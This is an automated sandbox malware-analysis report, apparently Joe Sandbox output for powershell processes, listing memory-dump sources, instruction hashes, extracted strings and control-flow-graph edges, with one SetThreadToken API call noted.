                                                                                                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction ID: 4e5248f01af8ffe2f0b2634c42c96051942b3939f32500304a78ada46e23d0cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFD067B0D042099F8790EFADC94156EFFF4EB48204F6485AA8919E7341EB329A12CBD1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c13bdd138951e35d52e2101d422365775dc3a961eae7b8cfb54f73ed256cdb8b
                                                                                                                                                                                                                      • Instruction ID: 3cf4ce77185b284e1e8cb016a3b5e670fa9e8fc4ce89235b965f2c2edc67788e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c13bdd138951e35d52e2101d422365775dc3a961eae7b8cfb54f73ed256cdb8b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64D067318041098BCB19ABA4E85B4BDBB74FF24311F4141A9E90752290EE362A5BCAC5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 66bbfe40f9dc8860f2f8a68c170bf94a2e521aa3fc1ebaa93cc0917a712bf59b
                                                                                                                                                                                                                      • Instruction ID: 645a4b5af28cd117972c17257e5f923992a9cb1cbe42806da0e3ea7982948836
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66bbfe40f9dc8860f2f8a68c170bf94a2e521aa3fc1ebaa93cc0917a712bf59b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D01234E0420A9BCB14EFA4D45687EBFB5BB44300F004155ED0593354EA306902CBC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 076181a6b715b69f8a8a155621e254d6672937cc700521b3a709d4d72293da1f
                                                                                                                                                                                                                      • Instruction ID: aae42b040884de77f9e4eebb99656afe752f86510e6fa8b147ce8d8f8e7bec86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 076181a6b715b69f8a8a155621e254d6672937cc700521b3a709d4d72293da1f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92C02B1B4693800FEF03923E1C21093BF30588322270682C3D804C7022D818CB0AC2B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                      • Opcode ID: a484f4e296f94336a7a84656f5830c611ee2036c71a7e21343b57ca001e7b61e
                                                                                                                                                                                                                      • Instruction ID: 28b37fbf2fd66310fade33e4c19b0fee009ba9fe0edfb2136f21a0c0822696fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a484f4e296f94336a7a84656f5830c611ee2036c71a7e21343b57ca001e7b61e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9101F250F4E3965FD76B123808285262FF21FC2A4071945DBC481CF29BCD148D4983E3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2187716592.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a8a56a19517ba462c15bbdff1492119cc07ca22e903bd39434c5bf29450dda26
                                                                                                                                                                                                                      • Instruction ID: 04b93413ae0223871afa322a286f838e75db240209ffeff078b7ee374f425087
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8a56a19517ba462c15bbdff1492119cc07ca22e903bd39434c5bf29450dda26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 020126711093549AE7208E29ECC4B67BFDDDF51325F08CA2AEC480BA82C678A841C7F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2187716592.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bc1b5b5ee53bcbb3b7a8204b170e5376075f9c87ce1832054afd865301e9e935
                                                                                                                                                                                                                      • Instruction ID: d60cce75a2f8afe7c5e02d018dfa48da4d7b4ae7771f7b6eb22eab268d33695b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc1b5b5ee53bcbb3b7a8204b170e5376075f9c87ce1832054afd865301e9e935
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C001B57200E3C09EE7128B258C94B56BFB8DF52224F09C1DBD9888F2D3C2695844C7B1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.2188518562.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_4b50000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 99ec45de66e14ba766e1b616d0162d695dd1b764170b9f1dcbe259821d19a29c
                                                                                                                                                                                                                      • Instruction ID: 603edb4bd1b3644102e4688276fe64ed5348a9984f25bc095d3ad6f3f5c73afb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99ec45de66e14ba766e1b616d0162d695dd1b764170b9f1dcbe259821d19a29c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248199E555A72A1C736EC52CB50

Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 22923 8d17860 22924 8d178a3 SetThreadToken 22923->22924 22925 8d178d1 22924->22925

Control-flow Graph

control_flow_graph 371 339b490-339b4a9 372 339b4ab 371->372 373 339b4ae-339b7f5 call 339acbc 371->373 372->373
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: {Yxo^$Yxo^
• API String ID: 0-3563231153
• Opcode ID: a486cc735c6cb2cd5a9462019858ba4243ea29fd2a6756008a5f7b79b941d1ea
• Instruction ID: 50cbb55e1d316d7e11b26835cf3e988358adf64b62d592e5610970554e36939c
• Opcode Fuzzy Hash: a486cc735c6cb2cd5a9462019858ba4243ea29fd2a6756008a5f7b79b941d1ea
• Instruction Fuzzy Hash: 8D919175B007199BDB19EFB4C4546AEB7E2EF84704B008A2DD10AAF344DF746D0A8BD6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$piTk$piTk$piTk$piTk$piTk$|,Vk
• API String ID: 0-1171896915
• Opcode ID: 0cf008ca9434e0e723995abe9137dc543a4d014758ad355b7271fc97ab75f419
• Instruction ID: d88ec6c0c6c28f593644a46dc664f68d4ed7076d67a3208519a71f9496cb6a62
• Opcode Fuzzy Hash: 0cf008ca9434e0e723995abe9137dc543a4d014758ad355b7271fc97ab75f419
• Instruction Fuzzy Hash: F72227F1B012268FEB249B6885017FA7BE1FF89311F0584FAD909CB251DB31D846D7A2

Control-flow Graph

control_flow_graph 201 7b23ce8-7b23d0d 202 7b23d13-7b23d18 201->202 203 7b23f00-7b23f4a 201->203 204 7b23d30-7b23d34 202->204 205 7b23d1a-7b23d20 202->205 211 7b23f50-7b23f55 203->211 212 7b240ce-7b24112 203->212 209 7b23eb0-7b23eba 204->209 210 7b23d3a-7b23d3c 204->210 207 7b23d22 205->207 208 7b23d24-7b23d2e 205->208 207->204 208->204 213 7b23ec8-7b23ece 209->213 214 7b23ebc-7b23ec5 209->214 215 7b23d3e-7b23d4a 210->215 216 7b23d4c 210->216 217 7b23f57-7b23f5d 211->217 218 7b23f6d-7b23f71 211->218 242 7b24228-7b2425d 212->242 243 7b24118-7b2411d 212->243 219 7b23ed0-7b23ed2 213->219 220 7b23ed4-7b23ee0 213->220 222 7b23d4e-7b23d50 215->222 216->222 223 7b23f61-7b23f6b 217->223 224 7b23f5f 217->224 227 7b24080-7b2408a 218->227 228 7b23f77-7b23f79 218->228 226 7b23ee2-7b23efd 219->226 220->226 222->209 229 7b23d56-7b23d75 222->229 223->218 224->218 231 7b24097-7b2409d 227->231 232 7b2408c-7b24094 227->232 233 7b23f7b-7b23f87 228->233 234 7b23f89 228->234 254 7b23d77-7b23d83 229->254 255 7b23d85 229->255 239 7b240a3-7b240af 231->239 240 7b2409f-7b240a1 231->240 238 7b23f8b-7b23f8d 233->238 234->238 238->227 244 7b23f93-7b23fb2 238->244 245 7b240b1-7b240cb 239->245 240->245 260 7b2428b-7b24295 242->260 261 7b2425f-7b24281 242->261 249 7b24135-7b24139 243->249 250 7b2411f-7b24125 243->250 277 7b23fc2 244->277 278 7b23fb4-7b23fc0 244->278 252 7b241da-7b241e4 249->252 253 7b2413f-7b24141 249->253 258 7b24127 250->258 259 7b24129-7b24133 250->259 262 7b241f1-7b241f7 252->262 263 7b241e6-7b241ee 252->263 264 7b24143-7b2414f 253->264 265 7b24151 253->265 266 7b23d87-7b23d89 254->266 255->266 258->249 259->249 274 7b24297-7b2429c 260->274 275 7b2429f-7b242a5 260->275 301 7b24283-7b24288 261->301 302 7b242d5-7b242fe 261->302 270 7b241f9-7b241fb 262->270 271 7b241fd-7b24209 262->271 269 7b24153-7b24155 264->269 265->269 266->209 272 7b23d8f-7b23d96 266->272 269->252 279 7b2415b-7b2415d 269->279 280 7b2420b-7b24225 270->280 271->280 272->203 281 7b23d9c-7b23da1 272->281 282 7b242a7-7b242a9 275->282 283 7b242ab-7b242b7 275->283 284 7b23fc4-7b23fc6 277->284 278->284 285 7b24177-7b2417e 279->285 286 7b2415f-7b24165 279->286 288 7b23da3-7b23da9 281->288 289 7b23db9-7b23dc8 281->289 290 7b242b9-7b242d2 282->290 283->290 284->227 294 7b23fcc-7b24003 284->294 295 7b24180-7b24186 285->295 296 7b24196-7b241d7 285->296 292 7b24167 286->292 293 7b24169-7b24175 286->293 297 7b23dab 288->297 298 7b23dad-7b23db7 288->298 289->209 308 7b23dce-7b23dec 289->308 292->285 293->285 324 7b24005-7b2400b 294->324 325 7b2401d-7b24024 294->325 303 7b2418a-7b24194 295->303 304 7b24188 295->304 297->289 298->289 320 7b24300-7b24326 302->320 321 7b2432d-7b2435c 302->321 303->296 304->296 308->209 323 7b23df2-7b23e17 308->323 320->321 332 7b24395-7b2439f 321->332 333 7b2435e-7b2437b 321->333 323->209 350 7b23e1d-7b23e24 323->350 330 7b2400f-7b2401b 324->330 331 7b2400d 324->331 326 7b24026-7b2402c 325->326 327 7b2403c-7b2407d 325->327 334 7b24030-7b2403a 326->334 335 7b2402e 326->335 330->325 331->325 339 7b243a1-7b243a5 332->339 340 7b243a8-7b243ae 332->340 347 7b243e5-7b243ea 333->347 348 7b2437d-7b2438f 333->348 334->327 335->327 344 7b243b0-7b243b2 340->344 345 7b243b4-7b243c0 340->345 349 7b243c2-7b243e2 344->349 345->349 347->348 348->332 352 7b23e26-7b23e41 350->352 353 7b23e6a-7b23e9d 350->353 359 7b23e43-7b23e49 352->359 360 7b23e5b-7b23e5f 352->360 366 7b23ea4-7b23ead 353->366 362 7b23e4b 359->362 363 7b23e4d-7b23e59 359->363 364 7b23e66-7b23e68 360->364 362->360 363->360 364->366
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: d0b650088463a5f090af0ff7d6ab98856f68c1f46b062c204d602b3fd3b6fcbc
• Instruction ID: 3e6357796e303cebbc59b6058264012b2eb2b04f0db5a4aa2900e9e8d1835240
• Opcode Fuzzy Hash: d0b650088463a5f090af0ff7d6ab98856f68c1f46b062c204d602b3fd3b6fcbc
• Instruction Fuzzy Hash: B01269F17052619FDB249B68850077A7BE2EFC5311F1488AAD909CF741CB35DC86D7A2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 435 8d17858-8d1789b 436 8d178a3-8d178cf SetThreadToken 435->436 437 8d178d1-8d178d7 436->437 438 8d178d8-8d178f5 436->438 437->438
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2183393980.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_8d10000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                      • Opcode ID: e7f6baa5f4752c3c87c6cb1a497791b927b4a1c254d0a247aded37c7a334209a
                                                                                                                                                                                                                      • Instruction ID: 403aa44efb224fed51a1fe5e9acf5cc0287fef53254cdc95ed345c73478a3d7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7f6baa5f4752c3c87c6cb1a497791b927b4a1c254d0a247aded37c7a334209a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F91102B59006488FCB10DFAAD485ADEFFF4EF89324F24849AD459A7350C774A944CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 441 8d17860-8d178cf SetThreadToken 443 8d178d1-8d178d7 441->443 444 8d178d8-8d178f5 441->444 443->444
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2183393980.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_8d10000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ThreadToken
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254676861-0
                                                                                                                                                                                                                      • Opcode ID: 3d35aff0da03cc99a8dec3773f0ae6d83416508150915b7d6f270981e96ece1a
                                                                                                                                                                                                                      • Instruction ID: 1120134d4cb76b8d9930dcd119b4426e3ad63e01091f85d36a6dd0d2255aff72
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d35aff0da03cc99a8dec3773f0ae6d83416508150915b7d6f270981e96ece1a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811F2B59007488FCB10DF9AD885B9EFBF8EF88324F24845AD519A7350C774A944CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 447 339e5b9-339e5ba 448 339e5bc-339e5c0 447->448 449 339e5c4-339e5cb 447->449 450 339e622-339e630 448->450 451 339e5c2 448->451 452 339e5cc-339e602 449->452 453 339e693-339e6b6 450->453 454 339e632 450->454 451->449 451->452 452->450 467 339e73a-339e753 453->467 468 339e6bc-339e6d3 453->468 455 339e63c 454->455 456 339e634-339e636 454->456 459 339e640-339e643 455->459 458 339e638-339e63a 456->458 456->459 458->455 461 339e644-339e689 458->461 459->461 461->453 473 339e75e 467->473 474 339e755 467->474 475 339e6db-339e738 468->475 476 339e75f 473->476 474->473 475->467 475->468 476->476
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: 3ab857c99be20d6682ffd240b78a00bde274bd400424666fc7b99d602cec27e0
                                                                                                                                                                                                                      • Instruction ID: bb077ea01af8c69bc130cabed1c2db23d011c28d406e6fb457d81146d7102378
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ab857c99be20d6682ffd240b78a00bde274bd400424666fc7b99d602cec27e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41AB74E00205DFCB14EFB9D894A9DBBF2EF49305F1485AAE019AB395DB30AD05CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 484 3396fe0-3396fff 485 3397105-3397143 484->485 486 3397005-3397008 484->486 513 339700a call 339767c 486->513 514 339700a call 3397697 486->514 488 3397010-3397022 490 339702e-3397043 488->490 491 3397024 488->491 496 3397049-3397059 490->496 497 33970ce-33970e7 490->497 491->490 498 339705b 496->498 499 3397065-3397073 call 339bf10 496->499 502 33970e9 497->502 503 33970f2 497->503 498->499 505 3397079-339707d 499->505 502->503 503->485 506 33970bd-33970c8 505->506 507 339707f-339708f 505->507 506->496 506->497 508 33970ab-33970b5 507->508 509 3397091-33970a9 507->509 508->506 509->506 513->488 514->488
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                                                                      • Opcode ID: 63ac3fd2089ef0ae7fe96a47b50b8ca2a25942121db36be2ae6543e1f78a533e
                                                                                                                                                                                                                      • Instruction ID: 630f319bf46db8c109c97740872beddf106decf3a5ea27fcc4d2b3b49642fb1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ac3fd2089ef0ae7fe96a47b50b8ca2a25942121db36be2ae6543e1f78a533e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E414B34A10205CFDB14DB69C8A8AAEBBF6EF8D315F195099D406AB391DA35DC01CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 515 339e610-339e612 516 339e61c-339e630 515->516 517 339e614-339e61a 515->517 519 339e693-339e6b6 516->519 520 339e632 516->520 517->516 530 339e73a-339e753 519->530 531 339e6bc-339e6d3 519->531 521 339e63c 520->521 522 339e634-339e636 520->522 524 339e640-339e643 521->524 523 339e638-339e63a 522->523 522->524 523->521 526 339e644-339e689 523->526 524->526 526->519 535 339e75e 530->535 536 339e755 530->536 537 339e6db-339e738 531->537 538 339e75f 535->538 536->535 537->530 537->531 538->538
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: ddb0ee49354399098b5edb373097c8de7566161c388e16d66d98cc300e9b6789
                                                                                                                                                                                                                      • Instruction ID: 84910c165394596c6454c5f8d16f0668bab3038c641f379000faff9aceea2090
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddb0ee49354399098b5edb373097c8de7566161c388e16d66d98cc300e9b6789
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA41FF75A00205DFCB15DF79D89469EBBF6FF48305F04856AE419AB385DB30AC05CBA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 546 339e640-339e6b6 554 339e73a-339e753 546->554 555 339e6bc-339e6d3 546->555 558 339e75e 554->558 559 339e755 554->559 560 339e6db-339e738 555->560 561 339e75f 558->561 559->558 560->554 560->555 561->561
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: piTk
                                                                                                                                                                                                                      • API String ID: 0-164278191
                                                                                                                                                                                                                      • Opcode ID: 114d8d8b31e9c96b171756061c319b451b2bc523a8490925c87b3bc87249a2e2
                                                                                                                                                                                                                      • Instruction ID: d9c5c27f69a32dfa7ff8c6f1ecf3b45ab62be14cc970d3c93de80702c08820b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 114d8d8b31e9c96b171756061c319b451b2bc523a8490925c87b3bc87249a2e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13318E74A00215DFCB14EF69D994B9EBBF2FF88305F148529E419AB394DB30AC45CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 569 339af98-339afa1 call 339a984 572 339afa6-339afaa 569->572 573 339afba-339afe2 572->573 574 339afac-339afb9 572->574 578 339afec-339b055 573->578 579 339afe4-339afeb 573->579 582 339b05e-339b07b 578->582 583 339b057-339b05d 578->583 579->578 583->582
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID: (empty)
• String ID: (&^q
• API String ID: 0-2067289071
• Opcode ID: 7f2d9cb1dc566628609e513e85b87621103b9b13ab93a4039fe6f084826f13e0
• Instruction ID: 945629a1c51e17349a078b9072839cd02b3915349f7198d427b356db6bd552c8
• Opcode Fuzzy Hash: 7f2d9cb1dc566628609e513e85b87621103b9b13ab93a4039fe6f084826f13e0
• Instruction Fuzzy Hash: 8F21E075A042588FCB14DFAED844BAEFFF5EF88320F14846AD019E7340CB7598058BA5

Control-flow Graph
• Graph export for the function at 33929f0 (block id, address range, edges; the executed/not-executed colouring of the rendered graph is not preserved in this text export): control_flow_graph 657 33929f0-3392a1e 658 3392af5-3392b37 657->658 659 3392a24-3392a3a 657->659 664 3392b3d-3392b56 658->664 665 3392c51-3392c61 658->665 660 3392a3c 659->660 661 3392a3f-3392a52 659->661 660->661 661->658 666 3392a58-3392a65 661->666 669 3392b58 664->669 670 3392b5b-3392b69 664->670 667 3392a6a-3392a7c 666->667 668 3392a67 666->668 667->658 675 3392a7e-3392a88 667->675 668->667 669->670 670->665 674 3392b6f-3392b79 670->674 676 3392b7b-3392b7d 674->676 677 3392b87-3392b94 674->677 678 3392a8a-3392a8c 675->678 679 3392a96-3392aa6 675->679 676->677 677->665 680 3392b9a-3392baa 677->680 678->679 679->658 681 3392aa8-3392ab2 679->681 682 3392bac 680->682 683 3392baf-3392bbd 680->683 684 3392ac0-3392af4 681->684 685 3392ab3-3392ab6 681->685 682->683 683->665 688 3392bc3-3392bd3 683->688 685->684 690 3392bd8-3392be5 688->690 691 3392bd5 688->691 690->665 693 3392be7-3392bf7 690->693 691->690 694 3392bf9 693->694 695 3392bfc-3392c08 693->695 694->695 695->665 697 3392c0a-3392c24 695->697 698 3392c29 697->698 699 3392c26 697->699 700 3392c2e-3392c38 698->700 699->698 701 3392c3d-3392c50 700->701
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 2d420143ca525af2affa4192c98241990f63e20d9c160b140c4e4bcc06075904
• Instruction ID: b19273fa303e64709a3873aac5c161a25f8a7c46914e1a717cfe589b3c43ba1d
• Opcode Fuzzy Hash: 2d420143ca525af2affa4192c98241990f63e20d9c160b140c4e4bcc06075904
• Instruction Fuzzy Hash: 5B915A74A00649DFCB15CF58C8D49AAFBB1FF48310B28899AD815EB365C736EC51CBA0

Control-flow Graph
• Graph export for the function at 3397740 (block id, address range, edges, resolved call targets; the executed/not-executed colouring of the rendered graph is not preserved in this text export): control_flow_graph 797 3397740-3397776 800 3397778-339777a 797->800 801 339777f-3397788 797->801 802 3397829-339782e 800->802 804 339778a-339778c 801->804 805 3397791-33977af 801->805 804->802 808 33977b1-33977b3 805->808 809 33977b5-33977b9 805->809 808->802 810 33977c8-33977cf 809->810 811 33977bb-33977c0 809->811 812 339782f-3397860 810->812 813 33977d1-33977fa 810->813 811->810 823 33978e2-33978e6 812->823 824 3397866-33978bd 812->824 816 3397808 813->816 817 33977fc-3397806 813->817 818 339780a-3397816 816->818 817->818 825 3397818-339781a 818->825 826 339781c-3397823 818->826 837 33978e9 call 3397938 823->837 838 33978e9 call 3397940 823->838 833 33978c9-33978d7 824->833 834 33978bf 824->834 825->802 826->802 828 33978ec-33978f1 833->823 836 33978d9-33978e1 833->836 834->833 837->828 838->828
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
